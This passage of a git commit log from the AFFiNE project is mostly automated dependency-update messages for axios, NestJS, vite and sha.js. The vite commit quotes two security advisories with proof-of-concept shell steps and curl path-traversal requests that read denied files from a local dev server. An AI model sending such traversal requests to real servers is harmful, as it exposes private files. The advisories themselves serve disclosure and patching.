<li><!-- raw HTML omitted --> <a href="https://github.com/mkhani01"
title="+111/-15 ([#6982](https://github.com/axios/axios/issues/6982)
)">khani</a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="https://github.com/axios/axios/commit/e5a33366d75b65f88052b230b103731eb7dcb793"><code>e5a3336</code></a>
chore(release): v1.12.2 (<a
href="https://redirect.github.com/axios/axios/issues/7031">#7031</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/38726c7586c6a2583b7e7dcdce0c4fedd013055d"><code>38726c7</code></a>
refactor: change if in else to else if (<a
href="https://redirect.github.com/axios/axios/issues/7028">#7028</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/cf78825e1229b60d1629ad0bbc8a752ff43c3f53"><code>cf78825</code></a>
fix(fetch): use current global fetch instead of cached one when env
fetch is ...</li>
<li><a
href="https://github.com/axios/axios/commit/c26d00f451949306f708aa78d1e9f12b9eb6ff4b"><code>c26d00f</code></a>
refactor: remove redundant assignment (<a
href="https://redirect.github.com/axios/axios/issues/7029">#7029</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/9fb41a8fcd6f698ee82175c0d9e654b4b0a7081c"><code>9fb41a8</code></a>
chore(ci): add local HTTP server for Karma tests; (<a
href="https://redirect.github.com/axios/axios/issues/7022">#7022</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/19f9f36850210511445c67c865466156d6d1dee2"><code>19f9f36</code></a>
docs(readme): add custom fetch section; (<a
href="https://redirect.github.com/axios/axios/issues/7024">#7024</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/3cac78c2de2d1d1af0c1b4753feff16c075f01d1"><code>3cac78c</code></a>
chore(release): v1.12.1 (<a
href="https://redirect.github.com/axios/axios/issues/7021">#7021</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/b5f26b75bdd9afa95016fb67d0cab15fc74cbf05"><code>b5f26b7</code></a>
fix(types): fixed env config types; (<a
href="https://redirect.github.com/axios/axios/issues/7020">#7020</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/0d8ad6e1de0f5339e02bc262d6f0df4936974120"><code>0d8ad6e</code></a>
chore(release): v1.12.0 (<a
href="https://redirect.github.com/axios/axios/issues/7013">#7013</a>)</li>
<li><a
href="https://github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2"><code>fd7f404</code></a>
fix: release pr run</li>
<li>Additional commits viewable in <a
href="https://github.com/axios/axios/compare/v1.9.0...v1.12.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=axios&package-manager=npm_and_yarn&previous-version=1.9.0&new-version=1.12.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/toeverything/AFFiNE/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-09-21 18:34:43 +00:00
renovate[bot] d231b47f1f chore: bump up nestjs (#13614)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs
from Renovate will soon appear from 'Mend'. Learn more
[here](https://redirect.github.com/renovatebot/renovate/discussions/37842).

This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [@nestjs/bullmq](https://redirect.github.com/nestjs/bull) | [`11.0.2`
->
`11.0.3`](https://renovatebot.com/diffs/npm/@nestjs%2fbullmq/11.0.2/11.0.3)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fbullmq/11.0.3?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fbullmq/11.0.2/11.0.3?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.5` ->
`11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.5/11.1.6)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.5/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.5` ->
`11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.5/11.1.6)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.5/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.5` ->
`11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.5/11.1.6)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.5/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.5` ->
`11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.5/11.1.6)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.5/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) |
[`6.0.0` ->
`6.0.1`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.0.0/6.0.1)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fschedule/6.0.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fschedule/6.0.0/6.0.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.5` ->
`11.1.6`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.5/11.1.6)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.5/11.1.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
<summary>nestjs/bull (@&#8203;nestjs/bullmq)</summary>

###
[`v11.0.3`](https://redirect.github.com/nestjs/bull/releases/tag/%40nestjs/bullmq%4011.0.3)

[Compare
Source](https://redirect.github.com/nestjs/bull/compare/@nestjs/bullmq@11.0.2...@nestjs/bullmq@11.0.3)

#### What's Changed

- feat(bullmq): add telemetry support for workers by
[@&#8203;noeljackson](https://redirect.github.com/noeljackson) in
[#&#8203;2585](https://redirect.github.com/nestjs/bull/pull/2585)

#### New Contributors

- [@&#8203;noeljackson](https://redirect.github.com/noeljackson) made
their first contribution in
[#&#8203;2585](https://redirect.github.com/nestjs/bull/pull/2585)

**Full Changelog**:
<https://github.com/nestjs/bull/compare/@nestjs/bull-shared@11.0.0...@&#8203;nestjs/bullmq@11.0.3>

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.6`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.6)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.5...v11.1.6)

##### v11.1.6 (2025-08-07)

##### Bug fixes

- `core`
- [#&#8203;15504](https://redirect.github.com/nestjs/nest/pull/15504)
fix(core): fix race condition in class dependency resolution from
imported modules
([@&#8203;hajekjiri](https://redirect.github.com/hajekjiri))
- [#&#8203;15469](https://redirect.github.com/nestjs/nest/pull/15469)
fix(core): attach root inquirer for nested transient providers
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- `microservices`
- [#&#8203;15508](https://redirect.github.com/nestjs/nest/pull/15508)
fix(microservices): report correct buffer length in exception
([@&#8203;kim-sung-jee](https://redirect.github.com/kim-sung-jee))
- [#&#8203;15492](https://redirect.github.com/nestjs/nest/pull/15492)
fix(microservices): fix kafka serilization of class instances
([@&#8203;LeonBiersch](https://redirect.github.com/LeonBiersch))

##### Dependencies

- `platform-fastify`
- [#&#8203;15493](https://redirect.github.com/nestjs/nest/pull/15493)
chore(deps): bump
[@&#8203;fastify/cors](https://redirect.github.com/fastify/cors) from
11.0.1 to 11.1.0
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 6

- Jiri Hajek
([@&#8203;hajekjiri](https://redirect.github.com/hajekjiri))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Leon Biersch
([@&#8203;LeonBiersch](https://redirect.github.com/LeonBiersch))
- Seongjee Kim
([@&#8203;kim-sung-jee](https://redirect.github.com/kim-sung-jee))
- [@&#8203;premierbell](https://redirect.github.com/premierbell)
- pTr ([@&#8203;ptrgits](https://redirect.github.com/ptrgits))

</details>

<details>
<summary>nestjs/schedule (@&#8203;nestjs/schedule)</summary>

###
[`v6.0.1`](https://redirect.github.com/nestjs/schedule/releases/tag/6.0.1)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.0.0...6.0.1)

#### What's Changed

- Add threshold to CronOptions by
[@&#8203;arjunatlightspeed](https://redirect.github.com/arjunatlightspeed)
in [#&#8203;2085](https://redirect.github.com/nestjs/schedule/pull/2085)
- refactor : clear jobs before application shutdown by
[@&#8203;spotlight21c](https://redirect.github.com/spotlight21c) in
[#&#8203;2053](https://redirect.github.com/nestjs/schedule/pull/2053)
- fix(deps): update dependency cron to v4.3.3 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;2001](https://redirect.github.com/nestjs/schedule/pull/2001)

#### New Contributors

-
[@&#8203;arjunatlightspeed](https://redirect.github.com/arjunatlightspeed)
made their first contribution in
[#&#8203;2085](https://redirect.github.com/nestjs/schedule/pull/2085)
- [@&#8203;spotlight21c](https://redirect.github.com/spotlight21c) made
their first contribution in
[#&#8203;2053](https://redirect.github.com/nestjs/schedule/pull/2053)

**Full Changelog**:
<https://github.com/nestjs/schedule/compare/6.0.0...6.0.1>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-09-21 14:35:11 +00:00
L-Sun fd717af3db fix(core): update and fix oxlint error (#13591)
#### PR Dependency Tree


* **PR #13591** 👈
  * **PR #13590**

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- Bug Fixes
- Improved drag-and-drop stability: draggables, drop targets, and
monitors now respond when option sources or external data change.
- Improved async actions and permission checks to always use the latest
callbacks and error handlers.

- Chores
  - Lint/Prettier configs updated to ignore the Git directory.
  - Upgraded oxlint dev dependency.

- Tests
- Updated several end-to-end tests for more reliable text selection,
focus handling, and timing.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-09-16 16:47:43 +08:00
renovate[bot] 039976ee6d chore: bump up vite version to v6.3.6 [SECURITY] (#13573)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [vite](https://vite.dev)
([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite))
| [`6.3.5` ->
`6.3.6`](https://renovatebot.com/diffs/npm/vite/6.3.5/6.3.6) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/vite/6.3.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/6.3.5/6.3.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-58751](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c)

### Summary
Files starting with the same name with the public directory were served
bypassing the `server.fs` settings.

### Impact
Only apps that match the following conditions are affected:

- explicitly exposes the Vite dev server to the network (using --host or
[`server.host` config
option](https://vitejs.dev/config/server-options.html#server-host))
- uses [the public directory
feature](https://vite.dev/guide/assets.html#the-public-directory)
(enabled by default)
- a symlink exists in the public directory

### Details
The
[servePublicMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79)
function is in charge of serving public files from the server. It
returns the
[viteServePublicMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106)
function which runs the needed tests and serves the page. The
viteServePublicMiddleware function [checks if the publicFiles variable
is
defined](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111),
and then uses it to determine if the requested page is public. In the
case that the publicFiles is undefined, the code will treat the
requested page as a public page, and go on with the serving function.
[publicFiles may be undefined if there is a symbolic link anywhere
inside the public
directory](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21).
In that case, every requested page will be passed to the public serving
function. The serving function is based on the
[sirv](https://redirect.github.com/lukeed/sirv) library. Vite patches
the library to add the possibility to test loading access to pages, but
when the public page middleware [disables this
functionality](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89)
since public pages are meant to be available always, regardless of
whether they are in the allow or deny list.

In the case of public pages, the serving function is [provided with the
path to the public
directory](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85)
as a root directory. The code of the sirv library [uses the join
function to get the full path to the requested
file](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42).
For example, if the public directory is "/www/public", and the requested
file is "myfile", the code will join them to the string
"/www/public/myfile". The code will then pass this string to the
normalize function. Afterwards, the code will [use the string's
startsWith
function](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43)
to determine whether the created path is within the given directory or
not. Only if it is, it will be served.

Since [sirv trims the trailing slash of the public
directory](https://redirect.github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119),
the string's startsWith function may return true even if the created
path is not within the public directory. For example, if the server's
root is at "/www", and the public directory is at "/www/p", if the
created path will be "/www/private.txt", the startsWith function will
still return true, because the string "/www/private.txt" starts with 
"/www/p". To achieve this, the attacker will use ".." to ask for the
file "../private.txt". The code will then join it to the "/www/p"
string, and will receive "/www/p/../private.txt". Then, the normalize
function will return "/www/private.txt", which will then be passed to
the startsWith function, which will return true, and the processing of
the page will continue without checking the deny list (since this is the
public directory middleware which doesn't check that).

### PoC
Execute the following shell commands:

```
npm  create  vite@latest
cd vite-project/
mkdir p
cd p
ln -s a b
cd ..
echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js
echo  "secret" > private.txt
npm install
npm run dev
```

Then, in a different shell, run the following command:

`curl -v --path-as-is 'http://localhost:5173/private.txt'`

You will receive a 403 HTTP Response,  because private.txt is denied.

Now in the same shell run the following command:

`curl -v --path-as-is 'http://localhost:5173/../private.txt'`

You will receive the contents of private.txt.

### Related links
-
https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb

####
[CVE-2025-58752](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3)

### Summary
Any HTML files on the machine were served regardless of the `server.fs`
settings.

### Impact

Only apps that match the following conditions are affected:

- explicitly exposes the Vite dev server to the network (using --host or
[server.host config
option](https://vitejs.dev/config/server-options.html#server-host))
- `appType: 'spa'` (default) or `appType: 'mpa'` is used

This vulnerability also affects the preview server. The preview server
allowed HTML files not under the output directory to be served.

### Details
The
[serveStaticMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123)
function is in charge of serving static files from the server. It
returns the
[viteServeStaticMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136)
function which runs the needed tests and serves the page. The
viteServeStaticMiddleware function [checks if the extension of the
requested file is
".html"](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144).
If so, it doesn't serve the page. Instead, the server will go on to the
next middlewares, in this case
[htmlFallbackMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14),
and then to
[indexHtmlMiddleware](https://redirect.github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438).
These middlewares don't perform any test against allow or deny rules,
and they don't make sure that the accessed file is in the root directory
of the server. They just find the file and send back its contents to the
client.

### PoC
Execute the following shell commands:

```
npm  create  vite@latest
cd vite-project/
echo  "secret" > /tmp/secret.html
npm install
npm run dev
```

Then, in a different shell, run the following command:

`curl -v --path-as-is
'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`

The contents of /tmp/secret.html will be returned.

This will also work for HTML files that are in the root directory of the
project, but are in the deny list (or not in the allow list). Test that
by stopping the running server (CTRL+C), and running the following
commands in the server's shell:

```
echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})'  >  [vite.config.js](http://vite.config.js)
mkdir secret_files
echo "secret txt" > secret_files/secret.txt
echo "secret html" > secret_files/secret.html
npm run dev

```

Then, in a different shell, run the following command:

`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`

You will receive a 403 HTTP Response,  because everything in the
secret_files directory is denied.

Now in the same shell run the following command:

`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`

You will receive the contents of secret_files/secret.html.

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

###
[`v6.3.6`](https://redirect.github.com/vitejs/vite/releases/tag/v6.3.6)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v6.3.5...v6.3.6)

Please refer to
[CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v6.3.6/packages/vite/CHANGELOG.md)
for details.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-09-14 01:55:54 +08:00
dependabot[bot] e158e11608 chore: bump sha.js from 2.4.11 to 2.4.12 (#13560)
Bumps [sha.js](https://github.com/crypto-browserify/sha.js) from 2.4.11
to 2.4.12.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/browserify/sha.js/blob/master/CHANGELOG.md">sha.js's
changelog</a>.</em></p>
<blockquote>
<h2><a
href="https://github.com/browserify/sha.js/compare/v2.4.11...v2.4.12">v2.4.12</a>
- 2025-07-01</h2>
<h3>Commits</h3>
<ul>
<li>[eslint] switch to eslint <a
href="https://github.com/browserify/sha.js/commit/7acadfbd3abb558880212b20669fcb09e1aa1c58"><code>7acadfb</code></a></li>
<li>[meta] add <code>auto-changelog</code> <a
href="https://github.com/browserify/sha.js/commit/b46e7116ebeaa82f34bbf2d7494fff7ef46eab3e"><code>b46e711</code></a></li>
<li>[eslint] fix package.json indentation <a
href="https://github.com/browserify/sha.js/commit/df9d521e16ddf55dc877c43c05706d43c057fad4"><code>df9d521</code></a></li>
<li>[Tests] migrate from travis to GHA <a
href="https://github.com/browserify/sha.js/commit/c43c64adc6d3607d470538df72338fc02e63bc24"><code>c43c64a</code></a></li>
<li>[Fix] support multi-byte wide typed arrays <a
href="https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5"><code>f2a258e</code></a></li>
<li>[meta] reorder package.json <a
href="https://github.com/browserify/sha.js/commit/d8d77c0a729c99593e304047f9d4335b498fd9ed"><code>d8d77c0</code></a></li>
<li>[meta] add <code>npmignore</code> <a
href="https://github.com/browserify/sha.js/commit/35aec35c667b606b2495be3e4186bbe977b9e087"><code>35aec35</code></a></li>
<li>[Tests] avoid console logs <a
href="https://github.com/browserify/sha.js/commit/73e33ae0ca6bca232627cac7473028e1d218f67e"><code>73e33ae</code></a></li>
<li>[Tests] fix tests run in batch <a
href="https://github.com/browserify/sha.js/commit/262913006e94616c8cd245ef6bd61bc4410b29e3"><code>2629130</code></a></li>
<li>[Tests] drop node requirement to 0.10 <a
href="https://github.com/browserify/sha.js/commit/00c7f234aa3bdbd427ffeb929bacbb05334eb3e9"><code>00c7f23</code></a></li>
<li>[Dev Deps] update <code>buffer</code>,
<code>hash-test-vectors</code>, <code>standard</code>,
<code>tape</code>, <code>typedarray</code> <a
href="https://github.com/browserify/sha.js/commit/92b5de5f67472d9f18413d38ad5b9aba29ff4c22"><code>92b5de5</code></a></li>
<li>[Tests] drop node requirement to v3 <a
href="https://github.com/browserify/sha.js/commit/9b5eca80fd9bb21cf05bdf43ce42661f1bbafeaa"><code>9b5eca8</code></a></li>
<li>[meta] set engines to <code>&amp;gt;= 4</code> <a
href="https://github.com/browserify/sha.js/commit/807084c5c0f943459e89838252cafbd175b549b7"><code>807084c</code></a></li>
<li>Only apps should have lockfiles <a
href="https://github.com/browserify/sha.js/commit/c72789c7a129cf453d44008ba27a88b90ac7989b"><code>c72789c</code></a></li>
<li>[Deps] update <code>inherits</code>, <code>safe-buffer</code> <a
href="https://github.com/browserify/sha.js/commit/5428cfc6f7177ad1a41c837b9387308848db96de"><code>5428cfc</code></a></li>
<li>[Dev Deps] update <code>@ljharb/eslint-config</code> <a
href="https://github.com/browserify/sha.js/commit/2dbe0aab419e90add5032c70c9663b8fc562adb8"><code>2dbe0aa</code></a></li>
<li>update README to reflect LICENSE <a
href="https://github.com/browserify/sha.js/commit/8938256dbb2241a7c749e4a399dbaff48cbe8e95"><code>8938256</code></a></li>
<li>[Dev Deps] add missing peer dep <a
href="https://github.com/browserify/sha.js/commit/d52889688ce524e63570f35e448635a29e6dd791"><code>d528896</code></a></li>
<li>[Dev Deps] remove unused <code>buffer</code> dep <a
href="https://github.com/browserify/sha.js/commit/94ca7247f467ef045f41d534708bf7c700e03828"><code>94ca724</code></a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="https://github.com/browserify/sha.js/commit/eb4ea2fd3da93d41e250f9ac8a1a133ce450e0a2"><code>eb4ea2f</code></a>
v2.4.12</li>
<li><a
href="https://github.com/browserify/sha.js/commit/d8d77c0a729c99593e304047f9d4335b498fd9ed"><code>d8d77c0</code></a>
[meta] reorder package.json</li>
<li><a
href="https://github.com/browserify/sha.js/commit/df9d521e16ddf55dc877c43c05706d43c057fad4"><code>df9d521</code></a>
[eslint] fix package.json indentation</li>
<li><a
href="https://github.com/browserify/sha.js/commit/35aec35c667b606b2495be3e4186bbe977b9e087"><code>35aec35</code></a>
[meta] add <code>npmignore</code></li>
<li><a
href="https://github.com/browserify/sha.js/commit/d52889688ce524e63570f35e448635a29e6dd791"><code>d528896</code></a>
[Dev Deps] add missing peer dep</li>
<li><a
href="https://github.com/browserify/sha.js/commit/b46e7116ebeaa82f34bbf2d7494fff7ef46eab3e"><code>b46e711</code></a>
[meta] add <code>auto-changelog</code></li>
<li><a
href="https://github.com/browserify/sha.js/commit/94ca7247f467ef045f41d534708bf7c700e03828"><code>94ca724</code></a>
[Dev Deps] remove unused <code>buffer</code> dep</li>
<li><a
href="https://github.com/browserify/sha.js/commit/2dbe0aab419e90add5032c70c9663b8fc562adb8"><code>2dbe0aa</code></a>
[Dev Deps] update <code>@ljharb/eslint-config</code></li>
<li><a
href="https://github.com/browserify/sha.js/commit/73e33ae0ca6bca232627cac7473028e1d218f67e"><code>73e33ae</code></a>
[Tests] avoid console logs</li>
<li><a
href="https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5"><code>f2a258e</code></a>
[Fix] support multi-byte wide typed arrays</li>
<li>Additional commits viewable in <a
href="https://github.com/crypto-browserify/sha.js/compare/v2.4.11...v2.4.12">compare
view</a></li>
</ul>
</details>
<details>
<summary>Maintainer changes</summary>
<p>This version was pushed to npm by <a
href="https://www.npmjs.com/~ljharb">ljharb</a>, a new releaser for
sha.js since your current version.</p>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=sha.js&package-manager=npm_and_yarn&previous-version=2.4.11&new-version=2.4.12)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
